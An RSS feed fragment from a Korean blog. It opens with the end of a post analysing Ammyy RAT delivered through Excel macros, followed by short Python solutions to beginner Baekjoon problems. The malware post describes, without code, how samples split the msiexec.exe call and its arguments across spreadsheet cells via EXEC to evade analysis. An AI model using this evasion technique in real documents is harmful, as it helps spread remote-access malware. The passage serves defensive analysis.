&lt;p&gt;&lt;span&gt;아직 &lt;/span&gt;&lt;span&gt;이전에 &lt;/span&gt;&lt;span&gt;배포된&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;악성파일을&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;분석하지&lt;/span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;span&gt;않았지만&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;다른&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;보고서에&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;따르면&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;해당&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;악성&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;파일은 코드 흐름을 어렵게 하는 것 외에 &lt;/span&gt;&lt;span&gt;'&lt;/span&gt;&lt;span&gt;EXEC&amp;nbsp;함수&lt;/span&gt;&lt;span&gt;'&lt;/span&gt;&lt;span&gt;를 통해 실행하였던 msiexec.exe 프로세스와 전달 인자 정보를 하나의 셀이 아닌 몇 개의 셀로 나누고, 실행 도중에 데이터를 합쳐 실행하도록 하는&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;진화된&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;형태가&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;보입니다&lt;/span&gt;&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;span&gt;&lt;span style=&quot;color: #009a87;&quot;&gt;&lt;b&gt;&amp;lt;참고&amp;gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;span&gt;&lt;/span&gt;&lt;a href=&quot;https://ko.wikipedia.org/wiki/%EC%9B%90%EA%B2%A9_%EA%B4%80%EB%A6%AC_%EB%8F%84%EA%B5%AC&quot;&gt;https://ko.wikipedia.org/wiki/%EC%9B%90%EA%B2%A9_%EA%B4%80%EB%A6%AC_%EB%8F%84%EA%B5%AC&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;span&gt;&lt;/span&gt;&lt;a href=&quot;https://asec.ahnlab.com/1232&quot;&gt;https://asec.ahnlab.com/1232&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://isarc.tachyonlab.com/2401&quot;&gt;https://isarc.tachyonlab.com/2401&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://seguranca-informatica.pt/flawedammyy-leveraging-undetected-xlm-macros-as-an-infection-vehicle/#.Xo3W7sgzaUl&quot;&gt;https://seguranca-informatica.pt/flawedammyy-leveraging-undetected-xlm-macros-as-an-infection-vehicle/#.Xo3W7sgzaUl&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>Ammyy RAT</category>
      <category>악성문서</category>
      <category>엑셀매크로</category>
      <author>알 수 없는 사용자</author>
      <guid isPermaLink="true">https://rgb4.tistory.com/4</guid>
      <comments>https://rgb4.tistory.com/4#entry4comment</comments>
      <pubDate>Thu, 9 Apr 2020 01:11:40 +0900</pubDate>
    </item>
    <item>
      <title>[백준] 2588 - 곱셈</title>
      <link>https://rgb4.tistory.com/16</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/FV4hB/btqDbET8vAZ/EzKb7ePcAtejGbYQoUc5zK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/FV4hB/btqDbET8vAZ/EzKb7ePcAtejGbYQoUc5zK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/FV4hB/btqDbET8vAZ/EzKb7ePcAtejGbYQoUc5zK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FFV4hB%2FbtqDbET8vAZ%2FEzKb7ePcAtejGbYQoUc5zK%2Fimg.png&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;pre class=&quot;procode-wrap&quot; style=&quot;padding: 0px; margin: 20px 0px; word-break: keep-all; overflow-wrap: break-word; -webkit-font-smoothing: antialiased; overflow: auto; tab-size: 4; border: none; font-family: 'SF Mono', Menlo, Consolas, Monaco, 'Lucida Console', Courier, 'Courier New', 'Source Han Sans (Modified)', -apple-system, 'SF Pro Text', 'SF UI Text', 'Segoe UI Emoji', 'Segoe UI', Roboto, Meiryo, 'Microsoft YaHei UI', 'Apple SD Gothic Neo', 'Malgun Gothic', monospace; white-space: pre-wrap; font-size: 0.875em; background-color: #f4f4f4; color: #222222; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;pre id=&quot;code_1586084094598&quot; class=&quot;python&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;a = int(input())
b = int(input())
 
print(a * (b % 10), a * ((b//10)%10), a * (b//100), a * b)&lt;/code&gt;&lt;/pre&gt;
&lt;pre class=&quot;procode-wrap&quot; style=&quot;padding: 0px; margin: 20px 0px; word-break: keep-all; overflow-wrap: break-word; -webkit-font-smoothing: antialiased; overflow: auto; tab-size: 4; border: none; font-family: 'SF Mono', Menlo, Consolas, Monaco, 'Lucida Console', Courier, 'Courier New', 'Source Han Sans (Modified)', -apple-system, 'SF Pro Text', 'SF UI Text', 'Segoe UI Emoji', 'Segoe UI', Roboto, Meiryo, 'Microsoft YaHei UI', 'Apple SD Gothic Neo', 'Malgun Gothic', monospace; white-space: pre-wrap; font-size: 0.875em; background-color: #f4f4f4; color: #222222; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;원게시물 : &lt;a href=&quot;https://kimbumyun.tistory.com/295&quot;&gt;https://kimbumyun.tistory.com/295&lt;/a&gt;&lt;/p&gt;</description>
      <category>Development/BAEKJOON</category>
      <author>KimBumYun</author>
      <guid isPermaLink="true">https://rgb4.tistory.com/16</guid>
      <comments>https://rgb4.tistory.com/16#entry16comment</comments>
      <pubDate>Sun, 5 Apr 2020 19:55:18 +0900</pubDate>
    </item>
    <item>
      <title>[백준] 10430 - 나머지</title>
      <link>https://rgb4.tistory.com/15</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bFBkKR/btqDbkBxZgW/jx33YfufMVq2NWugo7RpA0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bFBkKR/btqDbkBxZgW/jx33YfufMVq2NWugo7RpA0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bFBkKR/btqDbkBxZgW/jx33YfufMVq2NWugo7RpA0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbFBkKR%2FbtqDbkBxZgW%2Fjx33YfufMVq2NWugo7RpA0%2Fimg.png&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;pre class=&quot;procode-wrap&quot; style=&quot;padding: 0px; margin: 20px 0px; word-break: keep-all; overflow-wrap: break-word; -webkit-font-smoothing: antialiased; overflow: auto; tab-size: 4; border: none; font-family: 'SF Mono', Menlo, Consolas, Monaco, 'Lucida Console', Courier, 'Courier New', 'Source Han Sans (Modified)', -apple-system, 'SF Pro Text', 'SF UI Text', 'Segoe UI Emoji', 'Segoe UI', Roboto, Meiryo, 'Microsoft YaHei UI', 'Apple SD Gothic Neo', 'Malgun Gothic', monospace; white-space: pre-wrap; font-size: 0.875em; background-color: #f4f4f4; color: #222222; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;pre id=&quot;code_1586084035474&quot; class=&quot;python&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;a, b, c = input().split()
 
print((int(a) + int(b)) % int(c))
print(((int(a) % int(c)) + (int(b) % int(c))) % int(c))
print((int(a) * int(b)) % int(c))
print(((int(a) % int(c)) * (int(b) % int(c))) % int(c))&lt;/code&gt;&lt;/pre&gt;
&lt;pre class=&quot;procode-wrap&quot; style=&quot;padding: 0px; margin: 20px 0px; word-break: keep-all; overflow-wrap: break-word; -webkit-font-smoothing: antialiased; overflow: auto; tab-size: 4; border: none; font-family: 'SF Mono', Menlo, Consolas, Monaco, 'Lucida Console', Courier, 'Courier New', 'Source Han Sans (Modified)', -apple-system, 'SF Pro Text', 'SF UI Text', 'Segoe UI Emoji', 'Segoe UI', Roboto, Meiryo, 'Microsoft YaHei UI', 'Apple SD Gothic Neo', 'Malgun Gothic', monospace; white-space: pre-wrap; font-size: 0.875em; background-color: #f4f4f4; color: #222222; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;원게시물 : &lt;a href=&quot;https://kimbumyun.tistory.com/294&quot;&gt;https://kimbumyun.tistory.com/294&lt;/a&gt;&lt;/p&gt;</description>
      <category>Development/BAEKJOON</category>
      <author>KimBumYun</author>
      <guid isPermaLink="true">https://rgb4.tistory.com/15</guid>
      <comments>https://rgb4.tistory.com/15#entry15comment</comments>
      <pubDate>Sun, 5 Apr 2020 19:54:11 +0900</pubDate>
    </item>
    <item>
      <title>[백준] 10869 - 사칙연산</title>
      <link>https://rgb4.tistory.com/14</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/zkoIv/btqDbEmgrRJ/jnHMZyDsIZ8vTcI13k9MC0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/zkoIv/btqDbEmgrRJ/jnHMZyDsIZ8vTcI13k9MC0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/zkoIv/btqDbEmgrRJ/jnHMZyDsIZ8vTcI13k9MC0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FzkoIv%2FbtqDbEmgrRJ%2FjnHMZyDsIZ8vTcI13k9MC0%2Fimg.png&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;pre class=&quot;procode-wrap&quot; style=&quot;padding: 0px; margin: 20px 0px; word-break: keep-all; overflow-wrap: break-word; -webkit-font-smoothing: antialiased; overflow: auto; tab-size: 4; border: none; font-family: 'SF Mono', Menlo, Consolas, Monaco, 'Lucida Console', Courier, 'Courier New', 'Source Han Sans (Modified)', -apple-system, 'SF Pro Text', 'SF UI Text', 'Segoe UI Emoji', 'Segoe UI', Roboto, Meiryo, 'Microsoft YaHei UI', 'Apple SD Gothic Neo', 'Malgun Gothic', monospace; white-space: pre-wrap; font-size: 0.875em; background-color: #f4f4f4; color: #222222; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;pre id=&quot;code_1586083981424&quot; class=&quot;python&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;a, b = input().split()
 
print(int(a) + int(b))
print(int(a) - int(b))
print(int(a) * int(b))
print(int(int(a) / int(b)))
print(int(a) % int(b))&lt;/code&gt;&lt;/pre&gt;
&lt;pre class=&quot;procode-wrap&quot; style=&quot;padding: 0px; margin: 20px 0px; word-break: keep-all; overflow-wrap: break-word; -webkit-font-smoothing: antialiased; overflow: auto; tab-size: 4; border: none; font-family: 'SF Mono', Menlo, Consolas, Monaco, 'Lucida Console', Courier, 'Courier New', 'Source Han Sans (Modified)', -apple-system, 'SF Pro Text', 'SF UI Text', 'Segoe UI Emoji', 'Segoe UI', Roboto, Meiryo, 'Microsoft YaHei UI', 'Apple SD Gothic Neo', 'Malgun Gothic', monospace; white-space: pre-wrap; font-size: 0.875em; background-color: #f4f4f4; color: #222222; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;원게시물 : &lt;a href=&quot;https://kimbumyun.tistory.com/293&quot;&gt;https://kimbumyun.tistory.com/293&lt;/a&gt;&lt;/p&gt;</description>
      <category>Development/BAEKJOON</category>
      <author>KimBumYun</author>
      <guid isPermaLink="true">https://rgb4.tistory.com/14</guid>
      <comments>https://rgb4.tistory.com/14#entry14comment</comments>
      <pubDate>Sun, 5 Apr 2020 19:53:16 +0900</pubDate>
    </item>
    <item>
      <title>[백준] 1008 - A/B</title>
      <link>https://rgb4.tistory.com/13</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/otcBl/btqDdHoQUY2/mT004dWYvk5l67eNpKOkE0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/otcBl/btqDdHoQUY2/mT004dWYvk5l67eNpKOkE0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/otcBl/btqDdHoQUY2/mT004dWYvk5l67eNpKOkE0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FotcBl%2FbtqDdHoQUY2%2FmT004dWYvk5l67eNpKOkE0%2Fimg.png&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;pre class=&quot;procode-wrap&quot; style=&quot;padding: 0px; margin: 20px 0px; word-break: keep-all; overflow-wrap: break-word; -webkit-font-smoothing: antialiased; overflow: auto; tab-size: 4; border: none; font-family: 'SF Mono', Menlo, Consolas, Monaco, 'Lucida Console', Courier, 'Courier New', 'Source Han Sans (Modified)', -apple-system, 'SF Pro Text', 'SF UI Text', 'Segoe UI Emoji', 'Segoe UI', Roboto, Meiryo, 'Microsoft YaHei UI', 'Apple SD Gothic Neo', 'Malgun Gothic', monospace; white-space: pre-wrap; font-size: 0.875em; background-color: #f4f4f4; color: #222222; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;pre id=&quot;code_1586083911196&quot; class=&quot;python&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;a,b = input().split()
 
print(int(a) / int(b))&lt;/code&gt;&lt;/pre&gt;
&lt;pre class=&quot;procode-wrap&quot; style=&quot;padding: 0px; margin: 20px 0px; word-break: keep-all; overflow-wrap: break-word; -webkit-font-smoothing: antialiased; overflow: auto; tab-size: 4; border: none; font-family: 'SF Mono', Menlo, Consolas, Monaco, 'Lucida Console', Courier, 'Courier New', 'Source Han Sans (Modified)', -apple-system, 'SF Pro Text', 'SF UI Text', 'Segoe UI Emoji', 'Segoe UI', Roboto, Meiryo, 'Microsoft YaHei UI', 'Apple SD Gothic Neo', 'Malgun Gothic', monospace; white-space: pre-wrap; font-size: 0.875em; background-color: #f4f4f4; color: #222222; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;원게시물 : &lt;a href=&quot;https://kimbumyun.tistory.com/287&quot;&gt;https://kimbumyun.tistory.com/287&lt;/a&gt;&lt;/p&gt;</description>
      <category>Development/BAEKJOON</category>
      <author>KimBumYun</author>
      <guid isPermaLink="true">https://rgb4.tistory.com/13</guid>
      <comments>https://rgb4.tistory.com/13#entry13comment</comments>
      <pubDate>Sun, 5 Apr 2020 19:52:07 +0900</pubDate>
    </item>
    <item>
      <title>[백준] 10998 - A*B</title>
      <link>https://rgb4.tistory.com/12</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/znBt4/btqDaVIPmxi/tuhmCGd5w2WTROJePs3xK0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/znBt4/btqDaVIPmxi/tuhmCGd5w2WTROJePs3xK0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/znBt4/btqDaVIPmxi/tuhmCGd5w2WTROJePs3xK0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FznBt4%2FbtqDaVIPmxi%2FtuhmCGd5w2WTROJePs3xK0%2Fimg.png&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;pre class=&quot;procode-wrap&quot; style=&quot;padding: 0px; margin: 20px 0px; word-break: keep-all; overflow-wrap: break-word; -webkit-font-smoothing: antialiased; overflow: auto; tab-size: 4; border: none; font-family: 'SF Mono', Menlo, Consolas, Monaco, 'Lucida Console', Courier, 'Courier New', 'Source Han Sans (Modified)', -apple-system, 'SF Pro Text', 'SF UI Text', 'Segoe UI Emoji', 'Segoe UI', Roboto, Meiryo, 'Microsoft YaHei UI', 'Apple SD Gothic Neo', 'Malgun Gothic', monospace; white-space: pre-wrap; font-size: 0.875em; background-color: #f4f4f4; color: #222222; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;pre id=&quot;code_1586083859927&quot; class=&quot;python&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;a, b = input().split()
 
print(int(a) * int(b))&lt;/code&gt;&lt;/pre&gt;
&lt;pre class=&quot;procode-wrap&quot; style=&quot;padding: 0px; margin: 20px 0px; word-break: keep-all; overflow-wrap: break-word; -webkit-font-smoothing: antialiased; overflow: auto; tab-size: 4; border: none; font-family: 'SF Mono', Menlo, Consolas, Monaco, 'Lucida Console', Courier, 'Courier New', 'Source Han Sans (Modified)', -apple-system, 'SF Pro Text', 'SF UI Text', 'Segoe UI Emoji', 'Segoe UI', Roboto, Meiryo, 'Microsoft YaHei UI', 'Apple SD Gothic Neo', 'Malgun Gothic', monospace; white-space: pre-wrap; font-size: 0.875em; background-color: #f4f4f4; color: #222222; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;원게시물 : &lt;a href=&quot;https://kimbumyun.tistory.com/292&quot;&gt;https://kimbumyun.tistory.com/292&lt;/a&gt;&lt;/p&gt;</description>
      <category>Development/BAEKJOON</category>
      <author>KimBumYun</author>
      <guid isPermaLink="true">https://rgb4.tistory.com/12</guid>
      <comments>https://rgb4.tistory.com/12#entry12comment</comments>
      <pubDate>Sun, 5 Apr 2020 19:51:14 +0900</pubDate>
    </item>
    <item>
      <title>[백준] 1001 - A-B</title>
      <link>https://rgb4.tistory.com/11</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/eln1WP/btqDaUC5hef/tKH2AIC0NPSpT0YMZUc0Gk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/eln1WP/btqDaUC5hef/tKH2AIC0NPSpT0YMZUc0Gk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/eln1WP/btqDaUC5hef/tKH2AIC0NPSpT0YMZUc0Gk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Feln1WP%2FbtqDaUC5hef%2FtKH2AIC0NPSpT0YMZUc0Gk%2Fimg.png&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;pre class=&quot;procode-wrap&quot; style=&quot;padding: 0px; margin: 20px 0px; word-break: keep-all; overflow-wrap: break-word; -webkit-font-smoothing: antialiased; overflow: auto; tab-size: 4; border: none; font-family: 'SF Mono', Menlo, Consolas, Monaco, 'Lucida Console', Courier, 'Courier New', 'Source Han Sans (Modified)', -apple-system, 'SF Pro Text', 'SF UI Text', 'Segoe UI Emoji', 'Segoe UI', Roboto, Meiryo, 'Microsoft YaHei UI', 'Apple SD Gothic Neo', 'Malgun Gothic', monospace; white-space: pre-wrap; font-size: 0.875em; background-color: #f4f4f4; color: #222222; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;pre id=&quot;code_1586083789986&quot; class=&quot;python&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;a,b = input().split()
 
print(int(a) - int(b))&lt;/code&gt;&lt;/pre&gt;
&lt;pre class=&quot;procode-wrap&quot; style=&quot;padding: 0px; margin: 20px 0px; word-break: keep-all; overflow-wrap: break-word; -webkit-font-smoothing: antialiased; overflow: auto; tab-size: 4; border: none; font-family: 'SF Mono', Menlo, Consolas, Monaco, 'Lucida Console', Courier, 'Courier New', 'Source Han Sans (Modified)', -apple-system, 'SF Pro Text', 'SF UI Text', 'Segoe UI Emoji', 'Segoe UI', Roboto, Meiryo, 'Microsoft YaHei UI', 'Apple SD Gothic Neo', 'Malgun Gothic', monospace; white-space: pre-wrap; font-size: 0.875em; background-color: #f4f4f4; color: #222222; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;원게시물 : &lt;a href=&quot;https://kimbumyun.tistory.com/286&quot;&gt;https://kimbumyun.tistory.com/286&lt;/a&gt;&lt;/p&gt;</description>
      <category>Development/BAEKJOON</category>
      <author>KimBumYun</author>
      <guid isPermaLink="true">https://rgb4.tistory.com/11</guid>
      <comments>https://rgb4.tistory.com/11#entry11comment</comments>
      <pubDate>Sun, 5 Apr 2020 19:50:05 +0900</pubDate>
    </item>
    <item>
      <title>[백준] 1000 - A+B</title>
      <link>https://rgb4.tistory.com/10</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cHR6ZT/btqDcxNKYfZ/QH9QXfrQJKtlsMU3YXaxc0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cHR6ZT/btqDcxNKYfZ/QH9QXfrQJKtlsMU3YXaxc0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cHR6ZT/btqDcxNKYfZ/QH9QXfrQJKtlsMU3YXaxc0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcHR6ZT%2FbtqDcxNKYfZ%2FQH9QXfrQJKtlsMU3YXaxc0%2Fimg.png&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
